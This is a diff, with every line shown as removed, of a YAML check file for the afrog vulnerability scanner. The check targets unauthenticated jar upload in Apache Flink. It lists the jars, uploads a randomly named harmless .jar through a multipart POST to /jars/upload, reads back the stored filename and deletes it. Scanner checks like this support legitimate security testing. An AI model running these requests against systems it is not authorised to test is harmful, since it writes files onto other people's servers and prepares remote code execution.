■ ■ ■ ■ ■ ■
pocs/afrog-pocs/e-vulnerability/apache-flink-upload-rce.yaml
1 | | - | id: apache-flink-upload-rce |
2 | | - | |
3 | | - | info: |
4 | | - | name: apache-flink-upload-rce |
5 | | - | author: timwhite |
6 | | - | severity: critical |
7 | | - | description: apache-flink-upload-rce |
8 | | - | reference: |
9 | | - | - https://github.com/LandGrey/flink-unauth-rce |
10 | | - | |
11 | | - | set: |
12 | | - | r1: randomLowercase(8) |
13 | | - | r2: randomLowercase(4) |
14 | | - | rules: |
15 | | - | r0: |
16 | | - | request: |
17 | | - | method: GET |
18 | | - | path: /jars |
19 | | - | follow_redirects: true |
20 | | - | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files") |
21 | | - | r1: |
22 | | - | request: |
23 | | - | method: POST |
24 | | - | path: /jars/upload |
25 | | - | headers: |
26 | | - | Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 |
27 | | - | body: "\ |
28 | | - | --8ce4b16b22b58894aa86c421e8759df3\r\n\ |
29 | | - | Content-Disposition: form-data; name=\"jarfile\";filename=\"{{r2}}.jar\"\r\n\ |
30 | | - | Content-Type:application/octet-stream\r\n\ |
31 | | - | \r\n\ |
32 | | - | {{r1}}\r\n\ |
33 | | - | --8ce4b16b22b58894aa86c421e8759df3--\r\n\ |
34 | | - | " |
35 | | - | follow_redirects: true |
36 | | - | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) |
37 | | - | output: |
38 | | - | search: '"(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))".bsubmatch(response.body)' |
39 | | - | filen: search["filen"] |
40 | | - | r2: |
41 | | - | request: |
42 | | - | method: DELETE |
43 | | - | path: /jars/{{filen}} |
44 | | - | follow_redirects: true |
45 | | - | expression: response.status == 200 |
46 | | - | expression: r0() && r1() && r2() |